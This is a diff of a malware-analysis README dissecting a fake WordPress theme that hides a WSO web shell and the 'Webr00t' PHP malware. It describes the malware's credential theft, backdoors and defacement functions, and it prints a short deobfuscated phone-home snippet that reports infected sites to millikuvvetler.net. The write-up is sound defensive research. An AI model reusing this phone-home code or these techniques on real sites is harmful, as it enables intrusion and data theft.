Kinked theme and webroot.php materials

activex/README.md

@@ -1,11 +1,15 @@
-# Kinked theme named activex
+# Corrupt theme named activex
 
-A theme with a WSO 2.5 web shell, which itself has a phone-home,
-and a 
+A cheapjack modification of the Twenty Ten theme with a WSO 2.5 web shell,
+which itself has a phone-home.
+The theme zip file also carries the dreaded "Webr00t" PHP malware.
 
 The `webrot.php` file also appears on [pastebin](https://pastebin.com/Md5U41ME),
 dated Dec 30, 2013.
-Five years floating around.
+This code has floated around for at least 5 years.
+
+[Another analysis](https://blog.sucuri.net/2013/11/case-study-analyzing-a-wordpress-attack-dissecting-the-webr00t-cgi-shell-part-i.html)
+of apparently this same software.
 
 ## Origin
 
@@ -34,9 +38,9 @@ apparently located in Germany.
 
 ### Download
 
-Downloaded to a WordPress honey pot as a theme upload.
-The attacker(s) sent a zip-format file, which apparently has a
-real WordPress theme in it,
+Downloaded to a WordPress honey pot as a theme upload.  The attacker(s)
+sent a zip-format file, which has just enough of the right files to make
+WordPress think there's a WordPress theme in it,
 
 All the files have a date of Aug 1, 2013,
 except for `webrot.php`
@@ -50,9 +54,35 @@ obfuscation.
 `webrot.php` had a more intricate obfuscation,
 which it shares with other malware I've caught.
 See [A common encoding](../common_encoding) for details.
+The deobfuscation does use `ereg_replace()`, which has been removed in PHP 7.0.0.
+
+According to a comment in the `webrot.php` file, it is "protected by copyright
+law and provided under license".
+Reverse engineering of `webrot.php` is strictly prohibited.
+Dear me.
+
+The obfuscation code in `webrot.php` does mention "http://webr00t.info"
+I couldn't get that particular web site to display anything in a browser,
+but I did download the [html](webroot.info.index.html).
 
 ## Analysis
 
+I don't believe that this zip file contains a corrupted version of
+some real WordPress theme named "activex".
+As near as I can tell, no WordPress theme named "activex" exists.
+The zip file contains files from a "Twenty_Ten" WordPress theme.
+Virtually every file in the zip file has a `@since Twenty Ten 1.0` annotation,
+a few have `@since Twenty Ten 1.2`.
+[Twenty Ten theme 1.2](https://themes.trac.wordpress.org/timeline?from=2011-11-14T19%3A42%3A01Z&precision=second)
+has a date of 11/14/2011 on it.
+The files of the current (July, 2018) Twenty Ten theme (v2.5)
+are similar, but not identical to what's in this zip file.
+
+The two files that seem to contain malware have the
+names `images.php` and `webrot.php`.
+
+### images.php
+
 `images.php` is a Web Shell by oRb (WSO) version 2.5,
 complete with a phone-home:
 
@@ -71,26 +101,183 @@ Turkish hackers Ayyildiz Tim "breaking" a blog.
 That reconciles with the Turkish ISP or telecom for the IP address this
 attack came from.
 
-At least this is a new phone-home, not just a decoded "wsobuff" from WSO 2.5.1
-with a different "to" address. Props to ferid23@gmail.com for that effort.
+At least this is a new phone-home, not just a decoded/modified/recoded "wsobuff" from WSO 2.5.1
+with a different "to" address.
+Props to ferid23@gmail.com for that effort.
+
+### webrot.php
 
 `webrot.php` is slightly more interesting.
 
+Lots of "coded by WebRooT" comments throughout,
+but very uneven coding style and naming conventions.
+The final [webrot.php](final.webrot.php) file has had all its variables
+and functions renamed with 12-character strings of 'I' and '1'.
+The code is difficult to visually examine.
+None of the PHP files contained by `webrot.php` has had
+variables and functions renamed for obscurity.
+Some output is Turkish, some is English.
+Looks like "WebRooT" put this package together,
+not merely from pre-existing code,
+but from pre-exsisting PHP and Perl programs.
+The technique of writing out PHP and Perl files
+then invoking them with an `<iframe>` tag
+facilitates this type of code reuse.
+
 It phones home to mymktmymkt@gmail.com and tokmaktokmak1@gmail.com
 with the same information that `images.php` sends to ol' ferid23@gmail.com
 tokmaktokmak1@gmail.com appears on a [pastebin](https://pastebin.com/Md5U41ME),
 on a [Turkish security site](https://www.turkhackteam.org/web-server-guvenligi/1140416-webr00t-shell-decode.html)
 and a few others.
 
-`webrot.php` contains a number of base64-encoded pieces of source:
+Cities named "Tokmak" exist in both Ukraine and Kyrgyzstan.
 
-* Perl file `web.root` - a Perl web shell?
-* PHP file `cmd.php`
-* PHP file `litebypass.php`
-* PHP file `mass.php`
-* PHP file `wpindex.php` - Frenchish variable names?
+After the phone-home,
+it does some action based on the value of an HTTP parameter named `webr00t`.
+I can't really tell if all of the actions are callable from the HTML user interface.
+The code confuses me, and appears to be buggy.
 
-Lots of "coded by WebRooT" comments throughout,
-but very uneven coding style and naming conventions.
-Some output is Turkish, some is English.
-Looks like "WebRooT" put this package together from pre-existing code.
+* Using `/etc/named.conf`, uses zone names to try to pick up
+config files for WordPress, Joomla, vBulletin and maybe a few other
+CMS and/or ticketing systems.
+Seems to be coded for a very specific multi-tenant situation.
+* Figure out some kind of Google rank for each of the domains in `/etc/named.conf`
+* Try to create a symbolic link under DocumentRoot to an arbitrary file,
+which would make that file web-accessible. I think. Code appears buggy.
+* "CGI Shell", a Perl web shell, `web.root`, see below.
+* Create `.htaccess` file in directory in which `webrot.php` resides.
+Write out a file [`config.root`](config.root) full of Perl.
+The Perl looks like it creates a tar archive file that would
+contain any of a list of configuration files.
+All the configuration files would originally lives in `$HOME/public_html/` directory,
+which seems like it's designed for multi-tenant situations again.
+* Try to get PHP permissions opened up.
+Confusingly create a file `php_ini` that's like a `php.ini` file
+with safe mode off, and a few execute permissions turned on.
+I'm not sure this would have any effect.
+* Create a symbolic link from a specified file into the DocumentRoot somewhere.
+I'm not at all sure this code works, or that I've correctly comprehended it.
+* Creates a file `indexer/index.php` from base64-encoded string, which is apparently intended to ruin
+various CMS (phpBB, SMF, MyBB, vBulletin) by messing up the associated MySQL database.
+* Create a file `sqlcmd/index.php` from base64-encoded string.
+I think it has a stray "<?" token in that prevents it from working,
+but after you remove that token,
+you've got a little PHP program that can do simple actions on
+vBulletin, WordPress and Joomla, like change the admin user, or show all user names.
+Under some circumstances, it can execute arbitrary MySQL commands.
+It apparently can put a PHP file uploader backdoor in a MySQL database.
+* List entries in `/etc/passwd`, Linux password/user name file
+* Display `/etc/named.conf`, the BIND DNS server configuration file.
+* Display information on whether PHP has safe mode enabled,
+whether functions `symlink()`, `file_get_contents()`, `mkdir()` are enabled.
+* Change password for WordPress admin user.
+It always uses 'admin' as the WordPress admin user,
+which is no longer necessary.
+Again seems to indicate that Old School nature of this code.
+* Change Joomla admin user's password to some pre-hashed value.
+* Apparently change the FAQ template for a vBulletin system
+into a file uploading backdoor.
+* For a given interval of time, send UDP packets full of ASCII 'X' characters
+to a prescribed hostname.
+Packeting or DOSing someone, maybe?
+* Create symbolic links from every user's $HOME to files under DocumentRoot
+* Run an extraordinarily simple web shell, [cmd.php](cmd.php),
+built from a base64-encoded string.
+* Some crude, semi-automatic web site defacer.
+* Fetch WordPress user names and passwords from the local WordPress MySQL database,
+use those names and passwords to try to log in to another WordPress and deface it.
+* A half-finished "bypass" program that writes a command to a file,
+and then... nothing.
+The part where that command gets executed is missing.
+
+`webrot.php` has an unusual way of implementing those actions.
+`webrot.php` contains a number of base64-encoded pieces of source,
+approximately one for every action.
+It writes out the base64-decoded source into a file.
+By clever use of the "src" attribute of an `<iframe>` tag,
+`webrot.php` gets the user's browser to invoke the file it just wrote out.
+This works for the PHP files, which have a ".php" suffix.
+Since `activex` gets uploaded as a theme to WordPress,
+WordPress' web server will almost certainly interpret the ".php" files.
+
+### web.root
+
+But `webrot.php` also writes out `cgiweb/web.root`.
+That file name does not have a ".php" suffix,
+so `webrot.php` writes out a `.htaccess` file in the `cgiweb/` directory
+that would allow Apache web servers to execute `web.root`.
+
+`web.root` is a Perl, not PHP program.
+It is uniform in style: variables are `$StudlyCaps`,
+functions are called in the Old School `&FunctionName;` style,
+and it's carefully indented, using tabs.
+There are provisions for running on both "Unix" and "NT" 
+systems, which maybe gives a hint about its age (i.e. "old").
+It also has meaningful, non-leetspeak comments.
+If it had `use warnings;` and `use strict;` I would consider it
+well done.
+
+![web.root screen shot](https://raw.githubusercontent.com/bediger4000/php-malware-analysis/master/activex/webr00tcgishell.png)
+
+It lets you execute a single shell command at a time,
+and sends back the results.
+It almost is the "web telnet" it's billed as.
+
+## Phone home?
+
+It looks like even the 5-year-old pastebin version of `webrot.php` had
+a "phone home" of some sort:
+
+    $IIIIIII1Il1I = 'http://millikuvvetler.net/shellcommand/command.php';
+    $IIIIIII1Il1l = 'http://' . $_SERVER['HTTP_HOST'] . '' . $_SERVER['REQUEST_URI'] . '';
+    $IIIIIII1Il1l = urlencode($IIIIIII1Il1l);
+    echo @file_get_contents("{$IIIIIII1Il1I}?cmd={$IIIIIII1Il1l}");
+
+I got a 404 file not found when I tried that code.
+
+The situtation of millikuvvetler.net is very confusing.
+
+It has a DNS A record:
+
+    Name:   millikuvvetler.net
+    Address: 108.186.100.198
+
+`whois` attributes millikuvvetler.net to a Chinese organization:
+
+    Registrant Name: ke ma
+    Registrant Organization: make
+    Registrant Street: weiyangqu,shanxisheng,weiyangqu,huixicun,125fu1hao
+    Registrant City: xian
+    Registrant State/Province: SHANXI
+    Registrant Postal Code: 710000
+    Registrant Country: CN
+
+`whois` attributes millikuvvetler.net's IP address, 108.186.100.198,
+to another Chinese firm:
+
+    CustName:       Zhu Xiaofen
+    Address:        Room 57 building No.0 Yongtaiyuan Bengbu City  
+    Address:        Anhui Province
+    City:           Bengbu
+    StateProv:      Anhui
+    PostalCode:     233000
+    Country:        CN
+    RegDate:        2013-10-14
+    Updated:        2014-09-24
+    AS54600
+
+`geoiplookup` says that 108.186.100.198 is in the USA.
+
+`whois` has a USA phone number for abuse contact for that IP Address:
+
+    OrgTechName:   NOC
+    OrgTechPhone:  +1-657-206-5036  <-- US phone number
+    OrgTechEmail:  noc@petaexpress.com
+
+[Millikuvvelter](http://www.zone-h.org/archive/notifier=Millikuvvetler)
+as an entity is a prominent defacement notifier.
+Since `webrot.php` seems to do a phone-home to a hostname with a similar name,
+perhaps there's a connection...
+
+There's a "Milli Kuvvetler" [road or street](https://www.google.com/maps/place/Milli+Kuvvetler+Cd.,+10010+Karesi%2FBal%C4%B1kesir,+Turkey/@39.647568,27.8822743,17z/data=!3m1!4b1!4m5!3m4!1s0x14b700498342d107:0x81f195fc6c31a4fc!8m2!3d39.647568!4d27.884463)
+in Balikesir, Turkey.